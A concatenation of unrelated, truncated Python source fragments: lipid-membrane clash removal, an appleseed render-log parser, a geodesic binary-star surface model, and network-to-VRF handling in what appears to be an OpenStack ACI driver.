for t in range(len(indices_of_each_lipid)-1):
start_index = indices_of_each_lipid[t]
end_index = indices_of_each_lipid[t+1]
atom_range = numpy.arange(start_index, end_index, dtype=int)
single_lipid = lipid.portion_of(atom_range)
single_lipid.in_triangle_submargin = False
single_lipid.in_triangle_margin = True
### POSSIBLE FUTURE PROBLEM HERE. ###
# See https://stackoverflow.com/questions/40659212/futurewarning-elementwise-comparison-failed-returning-scalar-but-in-the-futur
# Kicking the can down the road, as suggested...
with warnings.catch_warnings(): # Kicking the can
warnings.simplefilter(action='ignore', category=FutureWarning) # down the road...
if all_ids[start_index] in hg_ids_not_in_triangle_margin:
single_lipid.in_triangle_margin = False
if not all_ids[start_index] in hg_ids_not_in_triangle_margin_or_submargin:
single_lipid.in_triangle_submargin = True
molecules_in_this_triangle.append(single_lipid)
if params['use_disk_instead_of_memory'] == "TRUE":
an_id = save_pickle(molecules_in_this_triangle, params)
self.results.append((tile_triangle, an_id))
else: self.results.append((tile_triangle, molecules_in_this_triangle))
gc.enable()
input_array = [(params, lipid, tile_triangle, min_headgroups, max_headgroups, index+1) for index, tile_triangle in enumerate(all_triangles)]
tmp = multi_threading(input_array, params['number_of_processors'], position_lipids_multiprocessing, params, "REMARK ")
molecules_by_triangle = tmp.results
return molecules_by_triangle
################## REMOVE STATIC CLASHES ##################
def remove_steric_clashes(molecules_by_triangle, params):
"""Remove lipids that have steric clashes
Arguments:
molecules_by_triangle -- A list of tuples, where each tuple contains a Triangle object and a list of lipid molecules (Molecule objects) that belong to that triangle
params -- A dictionary, the user-specified command-line parameters
"""
class remove_clashes_multiprocessing(general_task):
"""A class for identifying lipids that have steric clashes"""
def value_func(self, item, results_queue): # so overwriting this function
"""Identify lipids that have steric clashes
Arguments:
item -- A list or tuple, the input data required for the calculation
results_queue -- A multiprocessing.Queue() object for storing the calculation output
"""
triangle_index1 = item[0]
triangle_index2 = item[1]
triangle1 = item[2]
triangle1_lipids = item[3]
triangle2 = item[4]
triangle2_lipids = item[5]
params = item[6]
self.print_star_if_appropriate(item[7])
if triangle1.near_other_triangle(triangle2, params): # so only the lipids of proximate triangles are considered
if params['use_disk_instead_of_memory'] == "TRUE": triangle1_lipids = load_pickle(triangle1_lipids, params)
if params['use_disk_instead_of_memory'] == "TRUE": triangle2_lipids = load_pickle(triangle2_lipids, params)
clash_map = {}
# now generate a numpy array containing all the headgroups of the lipids of each triangle
triangle1_headgroups = numpy.empty((len(triangle1_lipids), 3))
for lipid_index, lipid in enumerate(triangle1_lipids):
headgroup_loc = lipid.all_atoms_numpy[lipid.get_headgroup_index(params['lipid_headgroup_marker'])]
triangle1_headgroups[lipid_index][0] = headgroup_loc[0]
triangle1_headgroups[lipid_index][1] = headgroup_loc[1]
triangle1_headgroups[lipid_index][2] = headgroup_loc[2]
triangle2_headgroups = numpy.empty((len(triangle2_lipids), 3))
for lipid_index, lipid in enumerate(triangle2_lipids):
headgroup_loc = lipid.all_atoms_numpy[lipid.get_headgroup_index(params['lipid_headgroup_marker'])]
triangle2_headgroups[lipid_index][0] = headgroup_loc[0]
triangle2_headgroups[lipid_index][1] = headgroup_loc[1]
triangle2_headgroups[lipid_index][2] = headgroup_loc[2]
# get the indices of all the lipids in the margin of the first lipid
indices_in_margin1 = []
for idx, lip in enumerate(triangle1_lipids):
if lip.in_triangle_margin == True: indices_in_margin1.append(idx)
indices_in_margin1 = numpy.array(indices_in_margin1)
if len(indices_in_margin1) > 0: # so there are some lipids in the margin
# get the indices of all the lipids in the margin of the second lipid
indices_in_margin2 = []
for idx, lip in enumerate(triangle2_lipids):
if lip.in_triangle_margin == True: indices_in_margin2.append(idx)
indices_in_margin2 = numpy.array(indices_in_margin2)
if len(indices_in_margin2) > 0: # so there are some lipids in the margin
# now, look at distances between all headgroups in margin to identify ones that are close enough to potentially clash
dists = cdist(triangle1_headgroups[indices_in_margin1], triangle2_headgroups[indices_in_margin2])
dists = dists < params['very_distant_lipids_cutoff']
indices_to_look_at1 = indices_in_margin1[numpy.nonzero(dists)[0]]
indices_to_look_at2 = indices_in_margin2[numpy.nonzero(dists)[1]]
# now do a pairwise comparison of all lipids, looking for clashes
for t in range(len(indices_to_look_at1)):
lipid_index1 = indices_to_look_at1[t]
lipid1 = triangle1_lipids[lipid_index1]
if lipid1.in_triangle_margin == True:
lipid_index2 = indices_to_look_at2[t]
lipid2 = triangle2_lipids[lipid_index2]
if lipid2.in_triangle_margin == True:
if two_lipids_clash(lipid1, lipid2, params['clash_cutoff'], 1, params, False):
# there's a clash. update the clash map
try:
clash_map[(lipid_index1, triangle_index1)].append((lipid_index2, triangle_index2))
except:
clash_map[(lipid_index1, triangle_index1)] = []
clash_map[(lipid_index1, triangle_index1)].append((lipid_index2, triangle_index2))
try:
clash_map[(lipid_index2, triangle_index2)].append((lipid_index1, triangle_index1))
except:
clash_map[(lipid_index2, triangle_index2)] = []
clash_map[(lipid_index2, triangle_index2)].append((lipid_index1, triangle_index1))
self.results.append(clash_map)
# generate a clash map, whcih specifies which lipids clash with each other
some_input = []
gc.disable() # because appending complex objects to a list
t = 0
for triangle_index1 in range(len(molecules_by_triangle)-1):
for triangle_index2 in range(triangle_index1 + 1, len(molecules_by_triangle)):
t = | |
import datetime
import csv
import re
import os.path
import sys
#from PyQt4 import uic, QtGui, QtCore
from PySide import QtUiTools, QtGui, QtCore
import functools
#http://thomas-cokelaer.info/tutorials/sphinx/docstring_python.html
################################################################################
# Prepare regex
################################################################################
re_main = re.compile( '(?P<timestamp>[0-9TZ:.-]+)\s+'
'\<(?P<thread_id>\d{3})\>\s+'
'(?P<vm>\d+)\s+MB\s+'
'(?P<msg_cat>\w+)\s+'
'\|(?P<msg_rest>.*)\n?' )
re_opening_texture_file = re.compile( '\s*opening texture file (?P<texture_path>[\w./\\\\-]+) for reading\.\.\.' )
re_rendering_progress = re.compile( '\s*rendering\, (?P<percentage>[\d.]+)\% done' )
re_wrote_image_file = re.compile( '\s*wrote image file (?P<image_path>[\w./\\\\-]+) in (?P<milliseconds>[\d,]+) ms\.' )
re_project_file_path = re.compile( '\s*loading project file (?P<project_file_path>[\w./\\\\-]+)\.\.\.' )
re_loaded_mesh_file = re.compile( '\s*loaded mesh file (?P<mesh_path>[\w./\\\\-]+) '
'\((?P<objects>[\d,]+) object, '
'(?P<vertices>[\d,]+) vertices, '
'(?P<triangles>[\d,]+) triangles\) '
'in (?P<milliseconds>[\d,]+) ms\.' )
re_scene_bounding_box = re.compile(
'\s*scene bounding box\: '
'\((?P<pt1_x>[0-9.-]+)\, (?P<pt1_y>[0-9.-]+)\, (?P<pt1_z>[0-9.-]+)\)\-'
'\((?P<pt2_x>[0-9.-]+)\, (?P<pt2_y>[0-9.-]+)\, (?P<pt2_z>[0-9.-]+)\)\.' )
re_scene_diameter = re.compile( '\s*scene diameter\: (?P<diameter>[0-9.-]+)\.' )
re_while_loading_mesh_object = re.compile( '\s*while loading mesh object \"(?P<object>[\w.]+)\"\:(?P<problem>.+)' )
# option regex
re_opt_frame_settings_trigger = re.compile( '\s*frame settings\:' )
re_opt_frame_settings_resolution = re.compile( '\s*resolution\s+(?P<x_resolution>[\d,]+) x (?P<y_resolution>[\d,]+)' )
re_opt_frame_settings_tile_size = re.compile( '\s*tile size\s+(?P<x_resolution>[\d,]+) x (?P<y_resolution>[\d,]+)' )
re_opt_frame_settings_pixel_format = re.compile( '\s*pixel format\s+(?P<pixel_format>[\w]+)' )
re_opt_frame_settings_filter = re.compile( '\s*filter\s+(?P<filter>[\w]+)' )
re_opt_frame_settings_filter_size = re.compile( '\s*filter size\s+(?P<filter_size>[\d.]+)' )
re_opt_frame_settings_color_space = re.compile( '\s*color space\s+(?P<color_space>[\w]+)' )
re_opt_frame_settings_premult_alpha = re.compile( '\s*premult\. alpha\s+(?P<premult_alpha>(on|off))' )
re_opt_frame_settings_clamping = re.compile( '\s*clamping\s+(?P<clamping>(on|off))' )
re_opt_frame_settings_gamma_correction = re.compile( '\s*gamma correction\s+(?P<gamma_correction>[\w]+)' )
re_opt_frame_settings_crop_window = re.compile( '\s*crop window\s+\((?P<x_top_left>[\d,]+), (?P<y_top_left>[\d,]+)\)-\((?P<x_bottom_right>[\d,]+), (?P<y_bottom_right>[\d,]+)\)' )
datetime_str_format = '%Y-%m-%dT%H:%M:%S.%fZ'
class ASLogLine( object ) :
"""Class representing a parsed line of an appleseed log file"""
__slots__ = ( 'line' , # the whole line string
'number' , # the line number
'_raw_timestamp' , # timestamp string
'_timestamp' , # cached datetime
'thread_id' ,
'vm' ,
'msg_cat' , # debug/info/warning/error
'msg_rest' , # Everything after the pipe
'msg_content' ,
'frame_setting_trigger' ) # Details of msg_rest
def __init__( self, line, number = -1 ) :
"""Init the class instance
Raise a ValueError is the given line is not parsable
"""
assert isinstance( line , basestring ), type( line )
assert isinstance( number, int ), type( number )
self.line = line
self.number = number
self._raw_timestamp = None
self._timestamp = None
self.thread_id = None
self.vm = None
self.msg_cat = None
self.msg_rest = None
self.msg_content = {}
# option triggers
self.frame_setting_trigger = False
self.__parse()
def __parse( self ) :
"""Parse line content and fill the ASLogLine instance"""
# first part of the line (always the same pattern)
match_grp = re_main.match( self.line )
if not match_grp :
raise ValueError( "Can't parse line {0.number} : {0.line}".format( self ) )
self._raw_timestamp = match_grp.group( 'timestamp' )
self.thread_id = int( match_grp.group( 'thread_id' ) )
self.vm = int( match_grp.group( 'vm' ) )
self.msg_cat = match_grp.group( 'msg_cat' )
self.msg_rest = match_grp.group( 'msg_rest' )
self.msg_content[ 'type' ] = None
# Loading project file
match_grp = re_project_file_path.match( self.msg_rest )
if match_grp :
self.msg_content[ 'type' ] = 'loading_project_file'
self.msg_content[ 'project_file_path' ] = match_grp.group( 'project_file_path' )
# Opening texture file
match_grp = re_opening_texture_file.match( self.msg_rest )
if match_grp :
self.msg_content[ 'type' ] = 'opening_texture_file'
self.msg_content[ 'texture_path' ] = match_grp.group( 'texture_path' )
# Rendering progress
match_grp = re_rendering_progress.match( self.msg_rest )
if match_grp :
self.msg_content[ 'type' ] = 'rendering_progress'
self.msg_content[ 'percentage' ] = float( match_grp.group( 'percentage' ) )
# Write final image
match_grp = re_wrote_image_file.match( self.msg_rest )
if match_grp :
self.msg_content[ 'type' ] = 'wrote_image_file'
self.msg_content[ 'image_path' ] = match_grp.group( 'image_path' )
raw_milliseconds = match_grp.group( 'milliseconds' )
raw_milliseconds = raw_milliseconds.replace( ',', '' )
self.msg_content[ 'milliseconds' ] = int( raw_milliseconds )
# Mesh file loaded
match_grp = re_loaded_mesh_file.match( self.msg_rest )
if match_grp :
self.msg_content[ 'type' ] = 'loaded_mesh_file'
self.msg_content[ 'mesh_path' ] = match_grp.group( 'mesh_path' )
raw_objects = match_grp.group( 'objects' )
raw_objects = raw_objects.replace( ',', '' )
self.msg_content[ 'objects' ] = int( raw_objects )
raw_vertices = match_grp.group( 'vertices' )
raw_vertices = raw_vertices.replace( ',', '' )
self.msg_content[ 'vertices' ] = int( raw_vertices )
raw_triangles = match_grp.group( 'triangles' )
raw_triangles = raw_triangles.replace( ',', '' )
self.msg_content[ 'triangles' ] = int( raw_triangles )
raw_milliseconds = match_grp.group( 'milliseconds' )
raw_milliseconds = raw_milliseconds.replace( ',', '' )
self.msg_content[ 'milliseconds' ] = int( raw_milliseconds )
# Scene bounding box
match_grp = re_scene_bounding_box.match( self.msg_rest )
if match_grp :
self.msg_content[ 'type' ] = 'scene_bounding_box'
self.msg_content[ 'bounding_box' ] = ( ( float( match_grp.group( 'pt1_x' ) ) ,
float( match_grp.group( 'pt1_y' ) ) ,
float( match_grp.group( 'pt1_z' ) ) ) ,
( float( match_grp.group( 'pt2_x' ) ) ,
float( match_grp.group( 'pt2_y' ) ) ,
float( match_grp.group( 'pt2_z' ) ) ) )
# Scene diameter
match_grp = re_scene_diameter.match( self.msg_rest )
if match_grp :
self.msg_content[ 'type' ] = 'scene_diameter'
self.msg_content[ 'diameter' ] = match_grp.group( 'diameter' )
match_grp = re_while_loading_mesh_object.match( self.msg_rest )
if match_grp :
self.msg_content[ 'type' ] = 'while_loading_mesh_object'
self.msg_content[ 'object' ] = match_grp.group( 'object' )
self.msg_content[ 'problem' ] = match_grp.group( 'problem' )
#######################################################################
# Triggers
#######################################################################
match_grp = re_opt_frame_settings_trigger.match( self.msg_rest )
if match_grp :
self.frame_setting_trigger = True
@property
def is_empty( self ) :
"""Return if the line is empty"""
return len( self.line ) == 0 or self.line == '\n'
@property
def timestamp( self ) :
"""Return a `datetime` object corresponding the given line"""
if self._timestamp is None and self._raw_timestamp is not None :
self._timestamp = datetime.datetime.strptime( self._raw_timestamp ,
datetime_str_format )
return self._timestamp
class ASLog( object ) :
"""The main appleseed log class
:Example:
>>> from appleseed.log_parser import ASLog
>>> as_log = ASLog('frame.1001.log')
>>> list(as_log.opened_texture_files)
['./_textures/coke_can_diff.exr', './_textures/coke_can_diff.exr', ...]
>>> as_log.ranges['vm']
(10, 108)
>>> for line in as_log:
... print line.msg_content
...
{'vertices': 16, 'mesh_path': './_geometry/...
"""
def __init__( self, path ) :
self._path = path
self._lines_data = list()
# options
self._options = dict()
# ranges
self._ranges = dict()
self._ranges[ 'first_datetime' ] = None
self._ranges[ 'last_datetime' ] = None
self._ranges[ 'vm' ] = ( 9999999, -9999999 )
self._parse()
def __len__( self ) :
return len( self._lines_data )
def __getitem__( self, index ) :
return self._lines_data[ index ]
@property
def _lines( self ) :
"""Read every lines from the log file."""
with open( self._path, 'r' ) as log_file :
for line in log_file :
yield line
def _parse( self ) :
triggereds = set()
for i, line in enumerate( self._lines ) :
try :
line_data = ASLogLine( line, i )
except Exception :
print "Warning, can't parse line {0} : {1}".format( i , line )
continue
if line_data.is_empty :
continue
self._lines_data.append( line_data )
################################################################
# Options
################################################################
msg_rest = line_data.msg_rest
if 'frame_settings' in triggereds :
############################################################
# Frame settings
############################################################
if 'frame_settings' not in self._options :
self._options[ 'frame_settings' ] = dict()
# shortcut
d = self._options[ 'frame_settings' ]
match_grp = re_opt_frame_settings_resolution.match( msg_rest )
if match_grp :
x = match_grp.group( 'x_resolution' )
x = int( x.replace( ',', '' ) )
y = match_grp.group( 'y_resolution' )
y = int( y.replace( ',', '' ) )
d[ 'resolution' ] = ( x, y )
match_grp = re_opt_frame_settings_tile_size.match( msg_rest )
if match_grp :
x = match_grp.group( 'x_resolution' )
x = int( x.replace( ',', '' ) )
y = match_grp.group( 'y_resolution' )
y = int( y.replace( ',', '' ) )
d[ 'tile_size' ] = ( x, y )
match_grp = re_opt_frame_settings_pixel_format.match( msg_rest )
if match_grp :
d[ 'pixel_format' ] = match_grp.group( 'pixel_format' )
match_grp = re_opt_frame_settings_filter.match( msg_rest )
if match_grp :
d[ 'filter' ] = match_grp.group( 'filter' )
match_grp = re_opt_frame_settings_filter_size.match( msg_rest )
if match_grp :
d[ 'filter_size' ] = float( match_grp.group( 'filter_size' ) )
match_grp = re_opt_frame_settings_color_space.match( msg_rest )
if match_grp :
d[ 'color_space' ] = match_grp.group( 'color_space' )
match_grp = re_opt_frame_settings_premult_alpha.match( msg_rest )
if match_grp :
premult_alpha = match_grp.group( 'premult_alpha' )
d[ 'premult_alpha' ] = True if premult_alpha == 'on' else False
match_grp = re_opt_frame_settings_clamping.match( msg_rest )
if match_grp :
clamping = match_grp.group( 'clamping' )
d[ 'clamping' ] = True if clamping == 'on' else False
match_grp = re_opt_frame_settings_gamma_correction.match( msg_rest )
if match_grp :
d[ 'gamma_correction' ] = float( match_grp.group( 'gamma_correction' ) )
# latest line of the option
match_grp = re_opt_frame_settings_crop_window.match( msg_rest )
if match_grp :
x_top_left = match_grp.group( 'x_top_left' )
x_top_left = int( x_top_left.replace( ',', '' ) )
y_top_left = match_grp.group( 'y_top_left' )
y_top_left = int( y_top_left.replace( ',', '' ) )
x_bottom_right = match_grp.group( 'x_bottom_right' )
x_bottom_right = int( x_bottom_right.replace( ',', '' ) )
y_bottom_right = match_grp.group( 'y_bottom_right' )
y_bottom_right = int( y_bottom_right.replace( ',', '' ) )
d[ 'crop_window' ] = ( x_top_left , y_top_left ,
x_bottom_right , y_bottom_right )
triggereds.remove( 'frame_settings' | |
# Licensed under a 3-clause BSD style license - see LICENSE
from __future__ import print_function, division
__all__ = ["Star"]
from ..Utils.import_modules import *
from .. import Utils
from .Star_base import Star_base
logger = logging.getLogger(__name__)
######################## class Star ########################
class Star(Star_base):
"""Star(Star_base)
This class allows determine the flux of the companion star
in a binary system using an atmosphere grid. It is derived
from the Star_base class.
The noticeable difference is that the surface is constructed
from a geodesic tesselation of equilateral triangles derived
from an isocahedron.
Axis convention:
x: From the primary center of mass towards the secondary.
y: Along the orbital plane along the orbital motion.
z: Along the orbital angular momentum.
"""
def __init__(self, ndiv, atmo_grid=None, read=False, oldchi=False):
Star_base.__init__(self, ndiv, atmo_grid=atmo_grid)
if read:
self._Read_geodesic()
else:
self._New_Initialization()
self.oldchi = oldchi
def _New_Initialization(self):
"""Initialization(self)
Run important initialization steps important for the
class to work.
self.vertices contains x,y,z coordinates of vertices. shape = self.n_vertices,3
self.faces contains indices of vertices forming faces. shape = self.n_faces,3
self.assoc contains indices of faces associated to a vertice. shape = self.n_vertices,6
Note: when only 5 faces associated, 6th value is equal to -99
"""
print( "Generating the geodesic surface using PyGTS" )
try:
import gts
except:
print( "You likely don't have the PyGTS package installed on your computer." )
print( "It is impossible to create the surface vertices from scratch." )
print( "Will trying reading them from the restart file instead." )
self._Read_geodesic()
return
# Generate the geodesic primitives
s = gts.sphere(self.ndiv)
x,y,z,t = gts.get_coords_and_face_indices(s,True)
self.vertices = np.c_[x,y,z]
self.faces = np.array(t)
self.n_vertices = self.vertices.shape[0]
self.n_faces = self.faces.shape[0]
print( "Calculatating the associations" )
self.assoc = Utils.Tessellation.Match_assoc(self.faces, self.n_vertices)
# We will pre-calculate the surface areas. They will need to be multiplied by rc^2.
# The calculation is simply the Pythagorean sum of the areas of the respective projections on the x,y,z planes.
print( "meshing the surface" )
mesh = self.vertices[self.faces]
print( "calculating the area" )
self.pre_area = 0.5 *np.sqrt( ((mesh[:,0,0]*mesh[:,1,1]+mesh[:,1,0]*mesh[:,2,1]+mesh[:,2,0]*mesh[:,0,1]) - (mesh[:,0,1]*mesh[:,1,0]+mesh[:,1,1]*mesh[:,2,0]+mesh[:,2,1]*mesh[:,0,0]))**2 + ((mesh[:,0,1]*mesh[:,1,2]+mesh[:,1,1]*mesh[:,2,2]+mesh[:,2,1]*mesh[:,0,2]) - (mesh[:,0,2]*mesh[:,1,1]+mesh[:,1,2]*mesh[:,2,1]+mesh[:,2,2]*mesh[:,0,1]))**2 + ((mesh[:,0,2]*mesh[:,1,0]+mesh[:,1,2]*mesh[:,2,0]+mesh[:,2,2]*mesh[:,0,0]) - (mesh[:,0,0]*mesh[:,1,2]+mesh[:,1,0]*mesh[:,2,2]+mesh[:,2,0]*mesh[:,0,2]))**2 )
# The cosine of x,y,z for the center of the faces. shape = n_faces, 3
print( "calculating the angles" )
self.cosx, self.cosy, self.cosz = mesh.mean(axis=1).T
return
def _Initialization(self):
"""Initialization(self)
Run important initialization steps important for the
class to work.
self.vertices contains x,y,z coordinates of vertices. shape = self.n_vertices,3
self.faces contains indices of vertices forming faces. shape = self.n_faces,3
self.assoc contains indices of faces associated to a vertice. shape = self.n_vertices,6
Note: when only 5 faces associated, 6th value is equal to -99
"""
print( "Generating the geodesic surface" )
# Generate the geodesic primitives
self.n_faces, self.n_vertices, self.faces, self.vertices, self.assoc = Utils.Tessellation.Make_geodesic(self.ndiv)
# We will pre-calculate the surface areas. They will need to be multiplied by rc^2.
# The calculation is simply the Pythagorean sum of the areas of the respective projections on the x,y,z planes.
print( "meshing the surface" )
mesh = self.vertices[self.faces]
print( "calculating the area" )
self.pre_area = 0.5 *np.sqrt( ((mesh[:,0,0]*mesh[:,1,1]+mesh[:,1,0]*mesh[:,2,1]+mesh[:,2,0]*mesh[:,0,1]) - (mesh[:,0,1]*mesh[:,1,0]+mesh[:,1,1]*mesh[:,2,0]+mesh[:,2,1]*mesh[:,0,0]))**2 + ((mesh[:,0,1]*mesh[:,1,2]+mesh[:,1,1]*mesh[:,2,2]+mesh[:,2,1]*mesh[:,0,2]) - (mesh[:,0,2]*mesh[:,1,1]+mesh[:,1,2]*mesh[:,2,1]+mesh[:,2,2]*mesh[:,0,1]))**2 + ((mesh[:,0,2]*mesh[:,1,0]+mesh[:,1,2]*mesh[:,2,0]+mesh[:,2,2]*mesh[:,0,0]) - (mesh[:,0,0]*mesh[:,1,2]+mesh[:,1,0]*mesh[:,2,2]+mesh[:,2,0]*mesh[:,0,2]))**2 )
# The cosine of x,y,z for the center of the faces. shape = n_faces, 3
print( "calculating the angles" )
self.cosx, self.cosy, self.cosz = mesh.mean(axis=1).T
return
def Outline(self, ntheta=100, debug=False):
"""Outline(ntheta=100, debug=False)
Calculates the radii of the outline of the star for a vector
of theta=np.arange(ntheta)/ntheta*cts.TWOPI.
theta is defined as np.arctan2(y_projected,z_projected).
theta0 = 0
dtheta = cts.TWOPI/ntheta
ntheta (100): Number of points defining the outline.
debug (False): Print debug information when True.
>>> self._Outline()
"""
if debug: print( 'Begin _Outline()' )
theta = np.arange(ntheta, dtype=float)/ntheta * cts.TWOPI
y = np.cos(theta)
z = np.sin(theta)
# radii of the outline of the star.
radii = self._Radius(y*0., y, z, self.psi0, self.rc_eq)
return radii
def _Read_geodesic(self):
"""Read_geodesic()
The information about the geodesic surface on the unit
sphere has already been precalculated. We simply load the
one have the desired precision.
"""
#f = open('geodesic/geodesic_n%i.txt'%self.ndiv, 'r')
f = open(Utils.__path__[0][:-5]+'geodesic/geodesic_n%i.txt'%self.ndiv, 'r')
lines = f.readlines()
# We store the number of vertices, faces and edges as class variables.
tmp, self.n_vertices, self.n_faces, self.n_edges = lines[0].split()
self.n_vertices = int(self.n_vertices)
self.n_faces = int(self.n_faces)
self.n_edges = int(self.n_edges)
# Vertice information contains coordinate x,y,z of vertices. shape = n_vertices,3
self.vertices = np.array([l.split() for l in lines[1:1+self.n_vertices]], dtype=float)
# Face information contains indices of vertices forming faces. shape = n_faces,3
self.faces = np.array([l.split() for l in lines[1+self.n_vertices:1+self.n_vertices+self.n_faces]], dtype=int)
self.faces = self.faces[:,1:]
# We calculate the associations
self.assoc = Utils.Tessellation.Match_assoc(self.faces, self.n_vertices)
# We will pre-calculate the surface areas. They will need to be multiplied by rc^2.
# The calculation is simply the Pythagorean sum of the areas of the respective projections on the x,y,z planes.
mesh = self.vertices[self.faces]
self.pre_area = 0.5 *np.sqrt( ((mesh[:,0,0]*mesh[:,1,1]+mesh[:,1,0]*mesh[:,2,1]+mesh[:,2,0]*mesh[:,0,1]) - (mesh[:,0,1]*mesh[:,1,0]+mesh[:,1,1]*mesh[:,2,0]+mesh[:,2,1]*mesh[:,0,0]))**2 + ((mesh[:,0,1]*mesh[:,1,2]+mesh[:,1,1]*mesh[:,2,2]+mesh[:,2,1]*mesh[:,0,2]) - (mesh[:,0,2]*mesh[:,1,1]+mesh[:,1,2]*mesh[:,2,1]+mesh[:,2,2]*mesh[:,0,1]))**2 + ((mesh[:,0,2]*mesh[:,1,0]+mesh[:,1,2]*mesh[:,2,0]+mesh[:,2,2]*mesh[:,0,0]) - (mesh[:,0,0]*mesh[:,1,2]+mesh[:,1,0]*mesh[:,2,2]+mesh[:,2,0]*mesh[:,0,2]))**2 )
# The cosine of x,y,z for the center of the faces. shape = n_faces, 3
self.cosx, self.cosy, self.cosz = mesh.mean(axis=1).T
return
def Radius(self):
"""Radius()
Returns the volume-averaged radius of the star, in
units of orbital separation.
>>> self.Radius()
"""
return (self.rc**3).mean()**(1./3)
def Roche(self):
"""Roche()
Returns the volume-averaged Roche lobe radius
of the star in units of orbital separation.
For the geodesic tessellation, the volume-averaged
Roche-lobe radius is easilly found since each surface
element subtend the same solid angle. Therefore, the
volume-averaged radius is the cubic root of the average
values of the radii cubed <rc^3>^1/3.
>>> self.Roche()
"""
filling = self.filling
self.Make_surface(filling=1.)
radius = self.Radius()
self.Make_surface(filling=filling)
return radius
def _Surface(self, debug=False):
"""_Surface(debug=False)
Calculates the surface grid values of surface gravity
and surface element area by solving the potential
equation.
debug (False): Print debug information when True.
>>> self._Surface()
"""
logger.log(9, "start")
if debug: print( 'Begin _Surface()' )
## Calculate some quantities
self._Calc_qp1by2om2()
## Saddle point, i.e. the Roche-lobe radius at L1 (on the near side)
xl1 = self._Saddle(0.5)
self.L1 = xl1
if debug: print( 'Saddle %f' %xl1 )
## Potential at the saddle point, L1
psil1 = self._Potential(xl1, 0., 0.)[-1]
if debug: print( 'Potential psil1 %f' %psil1 )
## rc_l1 is the stellar radius on the near side, i.e. the nose of the star
self.rc_l1 = self.filling*xl1
if debug: print( 'rc_l1 %f' %self.rc_l1 )
## Potential at rc_l1, the nose of the star
trc, trx, dpsi, dpsidx, dpsidy, dpsidz, psi0 = self._Potential(self.rc_l1, 0., 0.)
self.psi0 = psi0
if debug: print( 'Potential psi0\n trc: %f, trx %f, dpsi %f, dpsidx %f, dpsidy %f, dpsidz %f, psi0 %f' % (trc, trx, dpsi, dpsidx, dpsidy, dpsidz, self.psi0) )
## rc_pole is stellar radius at 90 degrees, i.e. at the pole, which is perpendicular to the line separating the two stars and the orbital plane
if debug: print( 'psi0,r '+str(self.psi0)+' '+str(r) )
self.rc_pole = self._Radius(0.,0.,1.,self.psi0,self.rc_l1)
trc, trx, dpsi, dpsidx, dpsidy, dpsidz, psi = self._Potential(0.,0.,self.rc_pole)
## log surface gravity at the pole of the star
self.logg_pole = np.log10(np.sqrt(dpsidx**2+dpsidy**2+dpsidz**2))
## rc_eq is stellar radius at 90 degrees in the orbital plane, i.e. at the equator, but not in the direction of the companion
self.rc_eq = self._Radius(0.,1.,0.,self.psi0,self.rc_l1)
trc, trx, dpsi, dpsidx, dpsidy, dpsidz, psi = self._Potential(0.,self.rc_eq,0.)
## log surface gravity at the pole of the star
self.logg_eq = np.log10(np.sqrt(dpsidx**2+dpsidy**2+dpsidz**2))
## r_vertices are the radii of the vertices. shape = n_vertices
self.r_vertices = self._Radius(self.vertices[:,0], self.vertices[:,1], self.vertices[:,2], self.psi0, self.rc_l1)
### Calculate useful quantities for all surface elements
## rc corresponds to r1 from Tjemkes et al., the distance from the center of mass of the pulsar companion. shape = n_faces
self.rc = self._Radius(self.cosx, self.cosy, self.cosz, self.psi0, self.rc_l1)
## rx corresponds to r2 from Tjemkes et al., the distance from the center of mass of the pulsar. shape = n_faces
trc, self.rx, dpsi, dpsidx, dpsidy, dpsidz, psi = self._Potential(self.rc*self.cosx,self.rc*self.cosy,self.rc*self.cosz)
## log surface gravity. shape = n_faces
geff = self._Geff(dpsidx, dpsidy, dpsidz)
self.logg = np.log10(geff)
## gradient of the gravitational potential in x,y,z. shape = n_faces
self.gradx = -dpsidx/geff
self.grady = -dpsidy/geff
self.gradz = -dpsidz/geff
## coschi is the cosine angle between | |
"'%(net_name)s' in project %(net_tenant)s with VRF %(vrf)s",
{'net_id': network_db.id, 'net_name': network_db.name,
'net_tenant': network_db.tenant_id, 'vrf': new_vrf})
# NOTE: Must only be called for networks that are not yet
# attached to any router.
session = aim_ctx.db_session
old_tenant_name = self.name_mapper.project(
session, network_db.tenant_id)
if (new_vrf.tenant_name != COMMON_TENANT_NAME and
old_tenant_name != new_vrf.tenant_name):
# Move BD and EPG to new VRF's Tenant, set VRF, and make
# sure routing is enabled.
LOG.debug("Moving network from tenant %(old)s to tenant %(new)s",
{'old': old_tenant_name, 'new': new_vrf.tenant_name})
bd, epg = self._map_network(session, network_db, None)
bd = self.aim.get(aim_ctx, bd)
self.aim.delete(aim_ctx, bd)
bd.tenant_name = new_vrf.tenant_name
bd.enable_routing = True
bd.vrf_name = new_vrf.name
bd = self.aim.create(aim_ctx, bd)
epg = self.aim.get(aim_ctx, epg)
self.aim.delete(aim_ctx, epg)
# ensure app profile exists in destination tenant
ap = aim_resource.ApplicationProfile(
tenant_name=new_vrf.tenant_name, name=self.ap_name)
if not self.aim.get(aim_ctx, ap):
self.aim.create(aim_ctx, ap)
epg.tenant_name = new_vrf.tenant_name
epg = self.aim.create(aim_ctx, epg)
else:
# Just set VRF and enable routing.
bd, epg = self._map_network(session, network_db, new_vrf)
bd = self.aim.update(aim_ctx, bd, enable_routing=True,
vrf_name=new_vrf.name)
# All non-router ports on this network need to be notified
# since their BD's VRF and possibly their BD's and EPG's
# Tenants have changed.
nets_to_notify.add(network_db.id)
return bd, epg
def _dissassociate_network_from_vrf(self, aim_ctx, network_db, old_vrf,
nets_to_notify):
LOG.debug("Dissassociating network %(net_id)s named '%(net_name)s' in "
"project %(net_tenant)s from VRF %(vrf)s",
{'net_id': network_db.id, 'net_name': network_db.name,
'net_tenant': network_db.tenant_id, 'vrf': old_vrf})
session = aim_ctx.db_session
bd, epg = self._map_network(session, network_db, old_vrf)
new_vrf = self._map_unrouted_vrf()
new_tenant_name = self.name_mapper.project(
session, network_db.tenant_id)
# REVISIT(rkukura): Share code with _associate_network_with_vrf?
if (old_vrf.tenant_name != COMMON_TENANT_NAME and
old_vrf.tenant_name != new_tenant_name):
# Move BD and EPG to network's Tenant, set unrouted VRF,
# and disable routing.
LOG.debug("Moving network from tenant %(old)s to tenant %(new)s",
{'old': old_vrf.tenant_name, 'new': new_tenant_name})
bd = self.aim.get(aim_ctx, bd)
self.aim.delete(aim_ctx, bd)
bd.tenant_name = new_tenant_name
bd.enable_routing = False
bd.vrf_name = new_vrf.name
bd = self.aim.create(aim_ctx, bd)
epg = self.aim.get(aim_ctx, epg)
self.aim.delete(aim_ctx, epg)
epg.tenant_name = new_tenant_name
epg = self.aim.create(aim_ctx, epg)
else:
